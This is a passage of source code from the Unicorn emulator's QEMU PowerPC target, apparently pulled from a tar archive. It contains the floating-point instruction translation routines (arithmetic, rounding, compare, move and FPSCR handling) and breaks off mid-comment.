GEN_DFP_S_Tp_Bp_Rc(denbcdq, 0x02, 0x1a), GEN_DFP_T_B_Rc(dxex, 0x02, 0x0b), GEN_DFP_T_Bp_Rc(dxexq, 0x02, 0x0b), GEN_DFP_T_A_B_Rc(diex, 0x02, 0x1b), GEN_DFP_Tp_A_Bp_Rc(diexq, 0x02, 0x1b), GEN_DFP_T_A_SH_Rc(dscli, 0x02, 0x02), GEN_DFP_Tp_Ap_SH_Rc(dscliq, 0x02, 0x02), GEN_DFP_T_A_SH_Rc(dscri, 0x02, 0x03), GEN_DFP_Tp_Ap_SH_Rc(dscriq, 0x02, 0x03), �������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/ppc/translate/fp-impl.inc.c�����������������������������������������������0000664�0000000�0000000�00000171763�14675241067�0022517�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * translate-fp.c * * Standard FPU translation */ static inline void gen_reset_fpstatus(TCGContext *tcg_ctx) { gen_helper_reset_fpstatus(tcg_ctx, tcg_ctx->cpu_env); } static inline void gen_compute_fprf_float64(TCGContext *tcg_ctx, TCGv_i64 arg) { gen_helper_compute_fprf_float64(tcg_ctx, tcg_ctx->cpu_env, arg); gen_helper_float_check_status(tcg_ctx, tcg_ctx->cpu_env); } #if defined(TARGET_PPC64) static void gen_set_cr1_from_fpscr(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, tmp, cpu_fpscr); tcg_gen_shri_i32(tcg_ctx, cpu_crf[1], tmp, 28); tcg_temp_free_i32(tcg_ctx, tmp); } #else static void gen_set_cr1_from_fpscr(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_shri_tl(tcg_ctx, cpu_crf[1], cpu_fpscr, 28); } #endif /*** Floating-Point arithmetic ***/ #define _GEN_FLOAT_ACB(name, op, op1, op2, isfloat, set_fprf, type) \ static void gen_f##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i64 t0; \ TCGv_i64 t1; \ TCGv_i64 t2; \ TCGv_i64 t3; \ if (unlikely(!ctx->fpu_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_FPU); \ return; \ } \ t0 = tcg_temp_new_i64(tcg_ctx); \ t1 = tcg_temp_new_i64(tcg_ctx); \ t2 = tcg_temp_new_i64(tcg_ctx); \ t3 = tcg_temp_new_i64(tcg_ctx); \ gen_reset_fpstatus(tcg_ctx); \ get_fpr(tcg_ctx, t0, rA(ctx->opcode)); \ get_fpr(tcg_ctx, t1, rC(ctx->opcode)); \ get_fpr(tcg_ctx, t2, rB(ctx->opcode)); \ gen_helper_f##op(tcg_ctx, t3, tcg_ctx->cpu_env, t0, t1, t2); \ if (isfloat) { \ gen_helper_frsp(tcg_ctx, t3, tcg_ctx->cpu_env, t3); \ } \ set_fpr(tcg_ctx, rD(ctx->opcode), t3); \ if (set_fprf) { \ gen_compute_fprf_float64(tcg_ctx, t3); \ } \ if (unlikely(Rc(ctx->opcode) != 0)) { \ gen_set_cr1_from_fpscr(ctx); \ } \ tcg_temp_free_i64(tcg_ctx, t0); \ tcg_temp_free_i64(tcg_ctx, t1); \ tcg_temp_free_i64(tcg_ctx, t2); \ tcg_temp_free_i64(tcg_ctx, t3); \ } #define GEN_FLOAT_ACB(name, op2, set_fprf, type) \ _GEN_FLOAT_ACB(name, name, 0x3F, op2, 0, set_fprf, type); \ _GEN_FLOAT_ACB(name##s, name, 0x3B, op2, 1, set_fprf, type); #define _GEN_FLOAT_AB(name, op, op1, op2, inval, isfloat, set_fprf, type) \ static void gen_f##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i64 t0; \ TCGv_i64 t1; \ TCGv_i64 t2; \ if (unlikely(!ctx->fpu_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_FPU); \ return; \ } \ t0 = tcg_temp_new_i64(tcg_ctx); \ t1 = tcg_temp_new_i64(tcg_ctx); \ t2 = tcg_temp_new_i64(tcg_ctx); \ gen_reset_fpstatus(tcg_ctx); \ get_fpr(tcg_ctx, t0, rA(ctx->opcode)); \ get_fpr(tcg_ctx, t1, rB(ctx->opcode)); \ gen_helper_f##op(tcg_ctx, t2, tcg_ctx->cpu_env, t0, t1); \ if (isfloat) { \ gen_helper_frsp(tcg_ctx, t2, tcg_ctx->cpu_env, t2); \ } \ set_fpr(tcg_ctx, rD(ctx->opcode), t2); \ if (set_fprf) { \ gen_compute_fprf_float64(tcg_ctx, t2); \ } \ if (unlikely(Rc(ctx->opcode) != 0)) { \ gen_set_cr1_from_fpscr(ctx); \ } \ tcg_temp_free_i64(tcg_ctx, t0); \ tcg_temp_free_i64(tcg_ctx, t1); \ tcg_temp_free_i64(tcg_ctx, t2); \ } #define GEN_FLOAT_AB(name, op2, inval, set_fprf, type) \ _GEN_FLOAT_AB(name, name, 0x3F, op2, inval, 0, set_fprf, type); \ _GEN_FLOAT_AB(name##s, name, 0x3B, op2, inval, 1, set_fprf, type); #define _GEN_FLOAT_AC(name, op, op1, op2, inval, isfloat, set_fprf, type) \ static void gen_f##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i64 t0; \ TCGv_i64 t1; \ TCGv_i64 t2; \ if (unlikely(!ctx->fpu_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_FPU); \ return; \ } \ t0 = tcg_temp_new_i64(tcg_ctx); \ t1 = tcg_temp_new_i64(tcg_ctx); \ t2 = tcg_temp_new_i64(tcg_ctx); \ gen_reset_fpstatus(tcg_ctx); \ get_fpr(tcg_ctx, t0, rA(ctx->opcode)); \ get_fpr(tcg_ctx, t1, rC(ctx->opcode)); \ gen_helper_f##op(tcg_ctx, t2, tcg_ctx->cpu_env, t0, t1); \ if (isfloat) { \ gen_helper_frsp(tcg_ctx, t2, tcg_ctx->cpu_env, t2); \ } \ set_fpr(tcg_ctx, rD(ctx->opcode), t2); \ if (set_fprf) { \ gen_compute_fprf_float64(tcg_ctx, t2); \ } \ if (unlikely(Rc(ctx->opcode) != 0)) { \ gen_set_cr1_from_fpscr(ctx); \ } \ tcg_temp_free_i64(tcg_ctx, t0); \ tcg_temp_free_i64(tcg_ctx, t1); \ tcg_temp_free_i64(tcg_ctx, t2); \ } #define GEN_FLOAT_AC(name, op2, inval, set_fprf, type) \ _GEN_FLOAT_AC(name, name, 0x3F, op2, inval, 0, set_fprf, type); \ _GEN_FLOAT_AC(name##s, name, 0x3B, op2, inval, 1, set_fprf, type); #define GEN_FLOAT_B(name, op2, op3, set_fprf, type) \ static void gen_f##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i64 t0; \ TCGv_i64 t1; \ if (unlikely(!ctx->fpu_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_FPU); \ return; \ } \ t0 = tcg_temp_new_i64(tcg_ctx); \ t1 = tcg_temp_new_i64(tcg_ctx); \ gen_reset_fpstatus(tcg_ctx); \ get_fpr(tcg_ctx, t0, rB(ctx->opcode)); \ gen_helper_f##name(tcg_ctx, t1, tcg_ctx->cpu_env, t0); \ set_fpr(tcg_ctx, rD(ctx->opcode), t1); \ if (set_fprf) { \ gen_compute_fprf_float64(tcg_ctx, t1); \ } \ if (unlikely(Rc(ctx->opcode) != 0)) { \ gen_set_cr1_from_fpscr(ctx); \ } \ tcg_temp_free_i64(tcg_ctx, t0); \ tcg_temp_free_i64(tcg_ctx, t1); \ } #define GEN_FLOAT_BS(name, op1, op2, set_fprf, type) \ static void gen_f##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i64 t0; \ TCGv_i64 t1; \ if (unlikely(!ctx->fpu_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_FPU); \ return; \ } \ t0 = tcg_temp_new_i64(tcg_ctx); \ t1 = tcg_temp_new_i64(tcg_ctx); \ gen_reset_fpstatus(tcg_ctx); \ get_fpr(tcg_ctx, t0, rB(ctx->opcode)); \ gen_helper_f##name(tcg_ctx, t1, tcg_ctx->cpu_env, t0); \ set_fpr(tcg_ctx, rD(ctx->opcode), t1); \ if (set_fprf) { \ gen_compute_fprf_float64(tcg_ctx, t1); \ } \ if (unlikely(Rc(ctx->opcode) != 0)) { \ gen_set_cr1_from_fpscr(ctx); \ } \ tcg_temp_free_i64(tcg_ctx, t0); \ tcg_temp_free_i64(tcg_ctx, t1); \ } /* fadd - fadds */ GEN_FLOAT_AB(add, 0x15, 0x000007C0, 1, PPC_FLOAT); /* fdiv - fdivs */ GEN_FLOAT_AB(div, 0x12, 0x000007C0, 1, PPC_FLOAT); /* fmul - fmuls */ GEN_FLOAT_AC(mul, 0x19, 0x0000F800, 1, PPC_FLOAT); /* fre */ GEN_FLOAT_BS(re, 0x3F, 0x18, 1, PPC_FLOAT_EXT); /* fres */ GEN_FLOAT_BS(res, 0x3B, 0x18, 1, PPC_FLOAT_FRES); /* frsqrte */ GEN_FLOAT_BS(rsqrte, 0x3F, 0x1A, 1, PPC_FLOAT_FRSQRTE); /* frsqrtes */ static void gen_frsqrtes(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i64 t0; TCGv_i64 t1; if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } t0 = tcg_temp_new_i64(tcg_ctx); t1 = tcg_temp_new_i64(tcg_ctx); gen_reset_fpstatus(tcg_ctx); get_fpr(tcg_ctx, t0, rB(ctx->opcode)); gen_helper_frsqrte(tcg_ctx, t1, tcg_ctx->cpu_env, t0); gen_helper_frsp(tcg_ctx, t1, tcg_ctx->cpu_env, t1); set_fpr(tcg_ctx, rD(ctx->opcode), t1); gen_compute_fprf_float64(tcg_ctx, t1); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_cr1_from_fpscr(ctx); } tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } /* fsel */ _GEN_FLOAT_ACB(sel, sel, 0x3F, 0x17, 0, 0, PPC_FLOAT_FSEL); /* fsub - fsubs */ GEN_FLOAT_AB(sub, 0x14, 0x000007C0, 1, PPC_FLOAT); /* Optional: */ /* fsqrt */ static void gen_fsqrt(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i64 t0; TCGv_i64 t1; if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } t0 = tcg_temp_new_i64(tcg_ctx); t1 = tcg_temp_new_i64(tcg_ctx); gen_reset_fpstatus(tcg_ctx); get_fpr(tcg_ctx, t0, rB(ctx->opcode)); gen_helper_fsqrt(tcg_ctx, t1, tcg_ctx->cpu_env, t0); set_fpr(tcg_ctx, rD(ctx->opcode), t1); gen_compute_fprf_float64(tcg_ctx, t1); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_cr1_from_fpscr(ctx); } tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } static void gen_fsqrts(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i64 t0; TCGv_i64 t1; if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } t0 = tcg_temp_new_i64(tcg_ctx); t1 = tcg_temp_new_i64(tcg_ctx); gen_reset_fpstatus(tcg_ctx); get_fpr(tcg_ctx, t0, rB(ctx->opcode)); gen_helper_fsqrt(tcg_ctx, t1, tcg_ctx->cpu_env, t0); gen_helper_frsp(tcg_ctx, t1, tcg_ctx->cpu_env, t1); set_fpr(tcg_ctx, rD(ctx->opcode), t1); gen_compute_fprf_float64(tcg_ctx, t1); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_cr1_from_fpscr(ctx); } tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } /*** Floating-Point multiply-and-add ***/ /* fmadd - fmadds */ GEN_FLOAT_ACB(madd, 0x1D, 1, PPC_FLOAT); /* fmsub - fmsubs */ GEN_FLOAT_ACB(msub, 0x1C, 1, PPC_FLOAT); /* fnmadd - fnmadds */ GEN_FLOAT_ACB(nmadd, 0x1F, 1, PPC_FLOAT); /* fnmsub - fnmsubs */ GEN_FLOAT_ACB(nmsub, 0x1E, 1, PPC_FLOAT); /*** Floating-Point round & convert ***/ /* fctiw */ GEN_FLOAT_B(ctiw, 0x0E, 0x00, 0, PPC_FLOAT); /* fctiwu */ GEN_FLOAT_B(ctiwu, 0x0E, 0x04, 0, PPC2_FP_CVT_ISA206); /* fctiwz */ GEN_FLOAT_B(ctiwz, 0x0F, 0x00, 0, PPC_FLOAT); /* fctiwuz */ GEN_FLOAT_B(ctiwuz, 0x0F, 0x04, 0, PPC2_FP_CVT_ISA206); /* frsp */ GEN_FLOAT_B(rsp, 0x0C, 0x00, 1, PPC_FLOAT); /* fcfid */ GEN_FLOAT_B(cfid, 0x0E, 0x1A, 1, PPC2_FP_CVT_S64); /* fcfids */ GEN_FLOAT_B(cfids, 0x0E, 0x1A, 0, PPC2_FP_CVT_ISA206); /* fcfidu */ GEN_FLOAT_B(cfidu, 0x0E, 0x1E, 0, PPC2_FP_CVT_ISA206); /* fcfidus */ GEN_FLOAT_B(cfidus, 0x0E, 0x1E, 0, PPC2_FP_CVT_ISA206); /* fctid */ GEN_FLOAT_B(ctid, 0x0E, 0x19, 0, PPC2_FP_CVT_S64); /* fctidu */ GEN_FLOAT_B(ctidu, 0x0E, 0x1D, 0, PPC2_FP_CVT_ISA206); /* fctidz */ GEN_FLOAT_B(ctidz, 0x0F, 0x19, 0, PPC2_FP_CVT_S64); /* fctidu */ GEN_FLOAT_B(ctiduz, 0x0F, 0x1D, 0, PPC2_FP_CVT_ISA206); /* frin */ GEN_FLOAT_B(rin, 0x08, 0x0C, 1, PPC_FLOAT_EXT); /* friz */ GEN_FLOAT_B(riz, 0x08, 0x0D, 1, PPC_FLOAT_EXT); /* frip */ GEN_FLOAT_B(rip, 0x08, 0x0E, 1, PPC_FLOAT_EXT); /* frim */ GEN_FLOAT_B(rim, 0x08, 0x0F, 1, PPC_FLOAT_EXT); static void gen_ftdiv(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i64 t0; TCGv_i64 t1; if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } t0 = tcg_temp_new_i64(tcg_ctx); t1 = tcg_temp_new_i64(tcg_ctx); get_fpr(tcg_ctx, t0, rA(ctx->opcode)); get_fpr(tcg_ctx, t1, rB(ctx->opcode)); gen_helper_ftdiv(tcg_ctx, cpu_crf[crfD(ctx->opcode)], t0, t1); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } static void gen_ftsqrt(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i64 t0; if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } t0 = tcg_temp_new_i64(tcg_ctx); get_fpr(tcg_ctx, t0, rB(ctx->opcode)); gen_helper_ftsqrt(tcg_ctx, cpu_crf[crfD(ctx->opcode)], t0); tcg_temp_free_i64(tcg_ctx, t0); } /*** Floating-Point compare ***/ /* fcmpo */ static void gen_fcmpo(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i32 crf; TCGv_i64 t0; TCGv_i64 t1; if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } t0 = tcg_temp_new_i64(tcg_ctx); t1 = tcg_temp_new_i64(tcg_ctx); gen_reset_fpstatus(tcg_ctx); crf = tcg_const_i32(tcg_ctx, crfD(ctx->opcode)); get_fpr(tcg_ctx, t0, rA(ctx->opcode)); get_fpr(tcg_ctx, t1, rB(ctx->opcode)); gen_helper_fcmpo(tcg_ctx, tcg_ctx->cpu_env, t0, t1, crf); tcg_temp_free_i32(tcg_ctx, crf); gen_helper_float_check_status(tcg_ctx, tcg_ctx->cpu_env); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } /* fcmpu */ static void gen_fcmpu(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i32 crf; TCGv_i64 t0; TCGv_i64 t1; if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } t0 = tcg_temp_new_i64(tcg_ctx); t1 = tcg_temp_new_i64(tcg_ctx); gen_reset_fpstatus(tcg_ctx); crf = tcg_const_i32(tcg_ctx, crfD(ctx->opcode)); get_fpr(tcg_ctx, t0, rA(ctx->opcode)); get_fpr(tcg_ctx, t1, rB(ctx->opcode)); gen_helper_fcmpu(tcg_ctx, tcg_ctx->cpu_env, t0, t1, crf); tcg_temp_free_i32(tcg_ctx, crf); gen_helper_float_check_status(tcg_ctx, tcg_ctx->cpu_env); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } /*** Floating-point move ***/ /* fabs */ /* XXX: beware that fabs never checks for NaNs nor update FPSCR */ static void gen_fabs(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i64 t0; TCGv_i64 t1; if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } t0 = tcg_temp_new_i64(tcg_ctx); t1 = tcg_temp_new_i64(tcg_ctx); get_fpr(tcg_ctx, t0, rB(ctx->opcode)); tcg_gen_andi_i64(tcg_ctx, t1, t0, ~(1ULL << 63)); set_fpr(tcg_ctx, rD(ctx->opcode), t1); if (unlikely(Rc(ctx->opcode))) { gen_set_cr1_from_fpscr(ctx); } tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } /* fmr - fmr. */ /* XXX: beware that fmr never checks for NaNs nor update FPSCR */ static void gen_fmr(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i64 t0; if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } t0 = tcg_temp_new_i64(tcg_ctx); get_fpr(tcg_ctx, t0, rB(ctx->opcode)); set_fpr(tcg_ctx, rD(ctx->opcode), t0); if (unlikely(Rc(ctx->opcode))) { gen_set_cr1_from_fpscr(ctx); } tcg_temp_free_i64(tcg_ctx, t0); } /* fnabs */ /* XXX: beware that fnabs never checks for NaNs nor update FPSCR */ static void gen_fnabs(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i64 t0; TCGv_i64 t1; if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } t0 = tcg_temp_new_i64(tcg_ctx); t1 = tcg_temp_new_i64(tcg_ctx); get_fpr(tcg_ctx, t0, rB(ctx->opcode)); tcg_gen_ori_i64(tcg_ctx, t1, t0, 1ULL << 63); set_fpr(tcg_ctx, rD(ctx->opcode), t1); if (unlikely(Rc(ctx->opcode))) { gen_set_cr1_from_fpscr(ctx); } tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } /* fneg */ /* XXX: beware that fneg never checks for NaNs nor update FPSCR */ static void gen_fneg(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i64 t0; TCGv_i64 t1; if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } t0 = tcg_temp_new_i64(tcg_ctx); t1 = tcg_temp_new_i64(tcg_ctx); get_fpr(tcg_ctx, t0, rB(ctx->opcode)); tcg_gen_xori_i64(tcg_ctx, t1, t0, 1ULL << 63); set_fpr(tcg_ctx, rD(ctx->opcode), t1); if (unlikely(Rc(ctx->opcode))) { gen_set_cr1_from_fpscr(ctx); } tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } /* fcpsgn: PowerPC 2.05 specification */ /* XXX: beware that fcpsgn never checks for NaNs nor update FPSCR */ static void gen_fcpsgn(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i64 t0; TCGv_i64 t1; TCGv_i64 t2; if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } t0 = tcg_temp_new_i64(tcg_ctx); t1 = tcg_temp_new_i64(tcg_ctx); t2 = tcg_temp_new_i64(tcg_ctx); get_fpr(tcg_ctx, t0, rA(ctx->opcode)); get_fpr(tcg_ctx, t1, rB(ctx->opcode)); tcg_gen_deposit_i64(tcg_ctx, t2, t0, t1, 0, 63); set_fpr(tcg_ctx, rD(ctx->opcode), t2); if (unlikely(Rc(ctx->opcode))) { gen_set_cr1_from_fpscr(ctx); } tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); } static void gen_fmrgew(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i64 b0; TCGv_i64 t0; TCGv_i64 t1; if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } b0 = tcg_temp_new_i64(tcg_ctx); t0 = tcg_temp_new_i64(tcg_ctx); t1 = tcg_temp_new_i64(tcg_ctx); get_fpr(tcg_ctx, t0, rB(ctx->opcode)); tcg_gen_shri_i64(tcg_ctx, b0, t0, 32); get_fpr(tcg_ctx, t0, rA(ctx->opcode)); tcg_gen_deposit_i64(tcg_ctx, t1, t0, b0, 0, 32); set_fpr(tcg_ctx, rD(ctx->opcode), t1); tcg_temp_free_i64(tcg_ctx, b0); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } static void gen_fmrgow(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i64 t0; TCGv_i64 t1; TCGv_i64 t2; if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } t0 = tcg_temp_new_i64(tcg_ctx); t1 = tcg_temp_new_i64(tcg_ctx); t2 = tcg_temp_new_i64(tcg_ctx); get_fpr(tcg_ctx, t0, rB(ctx->opcode)); get_fpr(tcg_ctx, t1, rA(ctx->opcode)); tcg_gen_deposit_i64(tcg_ctx, t2, t0, t1, 32, 32); set_fpr(tcg_ctx, rD(ctx->opcode), t2); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); } /*** Floating-Point status & ctrl register ***/ /* mcrfs */ static void gen_mcrfs(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv tmp = tcg_temp_new(tcg_ctx); TCGv_i32 tmask; TCGv_i64 tnew_fpscr = tcg_temp_new_i64(tcg_ctx); int bfa; int nibble; int shift; if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } bfa = crfS(ctx->opcode); nibble = 7 - bfa; shift = 4 * nibble; tcg_gen_shri_tl(tcg_ctx, tmp, cpu_fpscr, shift); tcg_gen_trunc_tl_i32(tcg_ctx, cpu_crf[crfD(ctx->opcode)], tmp); tcg_gen_andi_i32(tcg_ctx, cpu_crf[crfD(ctx->opcode)], cpu_crf[crfD(ctx->opcode)], 0xf); tcg_temp_free(tcg_ctx, tmp); tcg_gen_extu_tl_i64(tcg_ctx, tnew_fpscr, cpu_fpscr); /* Only the exception bits (including FX) should be cleared if read */ tcg_gen_andi_i64(tcg_ctx, tnew_fpscr, tnew_fpscr, ~((0xF << shift) & FP_EX_CLEAR_BITS)); /* FEX and VX need to be updated, so don't set fpscr directly */ tmask = tcg_const_i32(tcg_ctx, 1 << nibble); gen_helper_store_fpscr(tcg_ctx, tcg_ctx->cpu_env, tnew_fpscr, tmask); tcg_temp_free_i32(tcg_ctx, tmask); tcg_temp_free_i64(tcg_ctx, tnew_fpscr); } /* mffs */ static void gen_mffs(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t0; if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } t0 = tcg_temp_new_i64(tcg_ctx); gen_reset_fpstatus(tcg_ctx); tcg_gen_extu_tl_i64(tcg_ctx, t0, cpu_fpscr); set_fpr(tcg_ctx, rD(ctx->opcode), t0); if (unlikely(Rc(ctx->opcode))) { gen_set_cr1_from_fpscr(ctx); } tcg_temp_free_i64(tcg_ctx, t0); } /* mffsl */ static void gen_mffsl(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t0; if (unlikely(!(ctx->insns_flags2 & PPC2_ISA300))) { return; } if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } t0 = tcg_temp_new_i64(tcg_ctx); gen_reset_fpstatus(tcg_ctx); tcg_gen_extu_tl_i64(tcg_ctx, t0, cpu_fpscr); /* Mask everything except mode, status, and enables. */ tcg_gen_andi_i64(tcg_ctx, t0, t0, FP_DRN | FP_STATUS | FP_ENABLES | FP_RN); set_fpr(tcg_ctx, rD(ctx->opcode), t0); tcg_temp_free_i64(tcg_ctx, t0); } /* mffsce */ static void gen_mffsce(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t0; TCGv_i32 mask; if (unlikely(!(ctx->insns_flags2 & PPC2_ISA300))) { return; } if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } t0 = tcg_temp_new_i64(tcg_ctx); gen_reset_fpstatus(tcg_ctx); tcg_gen_extu_tl_i64(tcg_ctx, t0, cpu_fpscr); set_fpr(tcg_ctx, rD(ctx->opcode), t0); /* Clear exception enable bits in the FPSCR. */ tcg_gen_andi_i64(tcg_ctx, t0, t0, ~FP_ENABLES); mask = tcg_const_i32(tcg_ctx, 0x0003); gen_helper_store_fpscr(tcg_ctx, tcg_ctx->cpu_env, t0, mask); tcg_temp_free_i32(tcg_ctx, mask); tcg_temp_free_i64(tcg_ctx, t0); } static void gen_helper_mffscrn(DisasContext *ctx, TCGv_i64 t1) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i32 mask = tcg_const_i32(tcg_ctx, 0x0001); gen_reset_fpstatus(tcg_ctx); tcg_gen_extu_tl_i64(tcg_ctx, t0, cpu_fpscr); tcg_gen_andi_i64(tcg_ctx, t0, t0, FP_DRN | FP_ENABLES | FP_RN); set_fpr(tcg_ctx, rD(ctx->opcode), t0); /* Mask FPSCR value to clear RN. */ tcg_gen_andi_i64(tcg_ctx, t0, t0, ~FP_RN); /* Merge RN into FPSCR value. */ tcg_gen_or_i64(tcg_ctx, t0, t0, t1); gen_helper_store_fpscr(tcg_ctx, tcg_ctx->cpu_env, t0, mask); tcg_temp_free_i32(tcg_ctx, mask); tcg_temp_free_i64(tcg_ctx, t0); } /* mffscrn */ static void gen_mffscrn(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t1; if (unlikely(!(ctx->insns_flags2 & PPC2_ISA300))) { return; } if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } t1 = tcg_temp_new_i64(tcg_ctx); get_fpr(tcg_ctx, t1, rB(ctx->opcode)); /* Mask FRB to get just RN. */ tcg_gen_andi_i64(tcg_ctx, t1, t1, FP_RN); gen_helper_mffscrn(ctx, t1); tcg_temp_free_i64(tcg_ctx, t1); } /* mffscrni */ static void gen_mffscrni(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t1; if (unlikely(!(ctx->insns_flags2 & PPC2_ISA300))) { return; } if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } t1 = tcg_const_i64(tcg_ctx, (uint64_t)RM(ctx->opcode)); gen_helper_mffscrn(ctx, t1); tcg_temp_free_i64(tcg_ctx, t1); } /* mtfsb0 */ static void gen_mtfsb0(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint8_t crb; if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } crb = 31 - crbD(ctx->opcode); gen_reset_fpstatus(tcg_ctx); if (likely(crb != FPSCR_FEX && crb != FPSCR_VX)) { TCGv_i32 t0; t0 = tcg_const_i32(tcg_ctx, crb); gen_helper_fpscr_clrbit(tcg_ctx, tcg_ctx->cpu_env, t0); tcg_temp_free_i32(tcg_ctx, t0); } if (unlikely(Rc(ctx->opcode) != 0)) { tcg_gen_trunc_tl_i32(tcg_ctx, cpu_crf[1], cpu_fpscr); tcg_gen_shri_i32(tcg_ctx, cpu_crf[1], cpu_crf[1], FPSCR_OX); } } /* mtfsb1 */ static void gen_mtfsb1(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint8_t crb; if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } crb = 31 - crbD(ctx->opcode); gen_reset_fpstatus(tcg_ctx); /* XXX: 